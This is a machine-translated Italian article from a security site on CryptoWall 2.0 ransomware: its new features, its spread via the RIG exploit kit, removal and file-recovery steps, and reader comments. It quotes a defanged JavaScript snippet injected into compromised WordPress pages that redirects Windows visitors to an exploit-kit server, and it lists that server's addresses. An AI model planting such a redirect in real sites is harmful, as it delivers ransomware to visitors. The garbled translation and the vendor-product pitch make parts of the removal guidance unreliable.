Rimuovere CryptoWall 2.0 e ripristinare i file crittografati - Come, Tecnologia e Security Forum PC | SensorsTechForum.com
MINACCIA RIMOZIONE

Rimuovere CryptoWall 2.0 e ripristinare i file crittografati

1 Star2 Stars3 Stars4 Stars5 Stars (Ancora nessuna valutazione)
Loading ...

Rimuovere-CryptoWall2.0
Il CryptoWall ransomware è una minaccia enorme per gli amministratori di rete e gli utenti di PC, da quando è stato inizialmente rilasciato perché crittografa i dati locali, nonché i dati trovati su condivisioni di rete. La nuova versione del ransomware, CryptoWall 2.0 è ora migliorata, che rende ancora più difficile per l'utente di recuperare i file crittografati senza pagare il riscatto.

CryptoWall 2.0 – Cosa c'è di nuovo?

I criminali informatici utilizzano i propri gateway TOR nella nuova versione CryptoWall. Un individuo ID portafoglio viene inviato a ogni vittima al posto dei collegamenti utilizzati in precedenza hard coded separato che fosse la stessa per quasi tutte le vittime. Anche, i file non crittografati originali vengono cancellati in modo sicuro.

Proprie TOR Gateways

I server di pagamento di riscatto CyptoWall si trovano su TOR. Questo permette ai creatori di ransomware per rimanere nascosto dalle autorità. Per l'utente sia in grado di connettersi al server, ha bisogno di accedere alla rete TOR, e la maggior parte degli utenti lo trovano piuttosto difficile da installare TOR, in primo luogo. Questo è il motivo CryptoWall utilizzato un gateway Web-to-TOR che ha permesso le vittime ransomware di accedere al server di pagamento facilmente. Poiché i fornitori di questo gateway capito cosa stava accadendo, hanno iniziato a lista nera i loro server di pagamento in modo che non saranno utilizzati per scopi dannosi. La nuova versione di CryptoWall ha ora i propri server di pagamento - pay2tor.com, tor4pay.com e pay4tor.com.

Un ID Wallet unico per ogni vittima

Gli utenti che hanno scelto di pagare il riscatto sono dotati di un ID portafoglio individuo che è unico per ogni vittima. Inizialmente, gli utenti non sono stati presentati con questa opzione, che ha permesso alle persone di rubare le operazioni di pagamento di altri utenti e lo usano come loro pagamenti di riscatti. Gli indirizzi univoci di pagamento per ogni vittima questo non è più possibile.

I file non crittografati originali vengono eliminati in modo sicuro

Questa è un'altra nuova caratteristica per la CryptoWall 2.0. Nella versione precedente, il ransomware sarebbe crittografare i file di dati della vittima e poi basta cancellare quelli originali. Ciò ha reso possibile per gli strumenti di recupero dati per ripristinare le informazioni che è stato crittografato. Questo metodo non può più essere applicato come CryptoWall 2.0 cancella in modo sicuro i dati della vittima. Questo lascia all'utente compromesso con solo due opzioni: sia per ripristinare i file dai backup o di pagare la somma richiesta.

CryptoWall 2.0 Distribuito attraverso il RIG Exploit Kit

Gli esperti di sicurezza hanno recentemente osservato hacker che sfruttano collegamenti WordPress vulnerabili in modo da reindirizzare gli utenti di computer ai server che ospitano il RIG Exploit Kit. Quest'ultimo abusi un gran numero di vulnerabilità in Flash senza patch, Java e molte altre applicazioni, al fine di rilasciare la nuova versione del ransomware CryptoWall. Secondo il blog di Dynamoo, gli spammer stanno dietro questa campagna sono gli stessi che ha distribuito il recente messaggio di spam eFax, ma questa volta stanno consegnando CryptoWall 2.0 invece. Lo stesso blog rivela anche le seguenti informazioni:

  • hxxp://206.253.165.76:8080 è il server che ospita il RIG Exploit Kit.
  • hxxp://206.253.165.76:8080/ord / rot.php è il redirector exploit.
  • hxxp://206.253.165.76:8080/ord / ef.html è lo spam riportato dal blog.

I collegamenti WordPress compromessi sono noti per contenere questo codice:

→copione
var OSName = "Sconosciuto OS";
se (navigator.appVersion.indexOf("Win")!= -1) OSName = "Windows"; se (navigator.appVersion.indexOf("Mac")!= -1) OSName = "MacOS"; se (navigator.appVersion.indexOf("X11")!= -1) OSName = "UNIX"; se (navigator.appVersion.indexOf("Linux")!= -1) OSName = "Linux"; Var1 = 112; var2 = var1;
se(OSName == "Windows") {location.replace("Hxxp://206.253.165.76:8080/ord / rot.php ");}altro{location.replace("Http://google.com/search?q = efax ");}
/copione

Come rimuovere CryptoWall 2.0 e ripristinare i file crittografati

Stage One: Rimuovere CryptoWall 2.0

1. Primo e più importante - scaricare e installare uno scanner anti-malware legittimo e degno di fiducia, che vi aiuterà a eseguire una scansione completa del sistema ed eliminare tutte le minacce.donload_now_250
System Scanner Spy Hunter rileva solo la minaccia. Se si desidera che la minaccia da rimuovere automaticamente, è necessario acquistare la versione completa dello strumento di malware. Per saperne di più sullo strumento SpyHunter Anti-Malware

2. Eseguire una seconda scansione per assicurarsi che non vi siano programmi di software dannoso in esecuzione sul PC. A tal fine, si consiglia di scaricare ESET Online Scanner.

Il PC deve essere pulita ora.

Seconda fase: Ripristinare il file crittografati

Opzione 1: Migliore delle ipotesi - è stato eseguito il backup dei dati su base regolare, e ora è possibile utilizzare il backup più recente per ripristinare i file.

Opzione 2: Provare a decifrare i file con l'aiuto di Kaspersky RectorDecryptor.exe e RakhniDecryptor.exe. Essi si potrebbe aiutare nel processo, ma tenere a mente che non sono stati appositamente progettati per crittografare le informazioni che è stato decifrato da questo particolare ransomware.

Opzione 3: Copie shadow del volume

1. Installare l'ombra Explorer, che è disponibile con Windows Vista, Windows 7, Windows 8 e Windows XP Service Pack 2.

2. Da Ombra Explorer menu a discesa, scegliere un disco e l'ultima data che si desidera ripristinare le informazioni da.

3. Fare clic destro su un file crittografato casuale o una cartella, quindi selezionare "Esporta". Selezionare una posizione per ripristinare il contenuto del file o della cartella selezionata.

Rimuovere CryptoWall 2.0 Automaticamente con Spy Hunter Malware – Strumento di rimozione.

donload_now_250
Spy Hunter scanner rileva solo la minaccia. Se si desidera che la minaccia da rimuovere automaticamente, è necessario acquistare la versione completa del tool anti-malware.Per saperne di più sullo strumento SpyHunter Anti-Malware / Come disinstallare SpyHunter

Avatar

Berta Bilbao

Berta è un ricercatore di malware dedicato, sognare per un cyber spazio più sicuro. Il suo fascino con la sicurezza IT ha iniziato alcuni anni fa, quando un suo di malware bloccato del proprio computer.

Altri messaggi

6 Commenti

  1. Avatarrelic99

    La versione aggiornata vi impedirà di esecuzione o l'installazione di tutte le soluzioni antivirus, rimuovere l'unità infetti e schiavo a un altro computer per la scansione. Un abbonamento a pagamento per CryptoPrevent è l'unico strumento che conosco per prevenire le infezioni del v2.

    Replica
    1. AvatarGhiandaia

      Mi sono imbattuto in quello che doveva essere una nuova variante a pochi giorni fa,. Non riuscivo a debellare con la macchina Windows interessato attiva, così ho anche asservito dell'unità infetta ad una macchina non infetta, e ha proceduto a scansionare l'intera unità con il seguente: Malwarebytes, Hitman Pro, TDSSKiller, Avast Antivirus, e, infine, seguito con ESET. E l'infezione ancora tornato appena la macchina è stata collegata a Internet, evidentemente agganciando un processo di Internet Explorer per farlo. Ho trovato alterazioni DNS, alterazioni di file HOSTS, e ganci Winsock o BHO installati per tenere conto di esso. Ho finito per pulire l'unità e fare un ripristino di fabbrica. Qualcosa che raramente hanno a che fare per le infezioni di malware. Prima di farlo ho cercato di recuperare i file da copie shadow (Vittoria 7 64bit), e nessuno era presente come il malware aveva spazzato via il sistema di punti di ripristino e di tutte le copie dei file shadow. Io per fortuna sono riuscito a recuperare alcuni file che non erano ancora stati cifrati, quindi non era una perdita totale. Questo è stato il mio primo incontro con Cryptowall, e nonostante seguendo i consigli che avevo trovato sulla rimozione su vari forum di sicurezza,ancora tornato purtroppo. Ho dovuto ammettere la sconfitta. Bug Nasty.

      Replica
  2. AvatarAyesha

    Cryptowall 2.0 è quello che ho ottenuto ho scoperto come si chiamava giorni dopo . Ma non elimina ? Gli originali ? Come sono andato a cercare / come ho usato il software di recupero c'è il migliore fuori. Ho ottenuto il virus 11-18-2014

    Replica
  3. AvatarChris

    Ho ottenuto il virus intorno 11/11/2014. Almeno quello era il giorno in cui ho scoperto quello che era e spento la mia macchina e riavviato in modalità provvisoria dopo aver fatto la ricerca. Da allora ho cercato di capire come ripristinare i file che sono stati crittografati. Ho 2 mesi vale la pena di foto che vengono criptati, ma le informazioni non tornano. Spero che qualcuno possa far luce sul problema. Se un file è crittografato quindi sarebbe la data di modifica o creata la data è stato cifrato? Ho provato ad utilizzare Recuva e altri software per ripristinare, ma dice che non è stato eliminato. Tutte le idee?

    Replica
  4. AvatarHipolito Gonzalez

    Ciao buongiorno, mio virus pc infettato criptowall fede v3.0, e miei file sono stati crittografati con la chiave pubblica RSA 2048 e ho bisogno di recuperare, se qualcuno mi può aiutare io ringrazio molto.
    Saluti
    Hipolito

    Replica
    1. AvatarMilena Dimitrova

      Ci Hipolito,

      Siamo spiacenti di apprendere siete stati infettati con CryptoWall 2.0! Per favore unirsi al nostro forum e leggere i seguenti argomenti: http://sensorstechforum.com/forums/internet-and-networking-security/help-decrypt-files-encrypted-by-cryptowall-3-0/
      http://sensorstechforum.com/forums/malware-removal-questions-and-guides/how-to-remove-cryptowall-4-0-and-restore-your-data/

      Sfortunatamente, La crittografia RSA-2048 è molto difficile da rompere. Ci auguriamo che gli strumenti di cui negli argomenti aiutano a recuperare i file! Non esitate a chiederci se avete altre domande.

      Milena e squadra STF

      Replica

Lascio un commento

Il tuo indirizzo email non verrà pubblicato. I campi obbligatori sono contrassegnati *

Termine è esaurito. Ricarica CAPTCHA.

Condividi su Facebook Quota
Loading ...
Condividi su Twitter Tweet
Loading ...
Condividi su Google Plus Quota
Loading ...
Condividi su Linkedin Quota
Loading ...
Condividi su Digg Quota
Condividi su Reddit Quota
Loading ...
Condividi su Stumbleupon Quota
Loading ...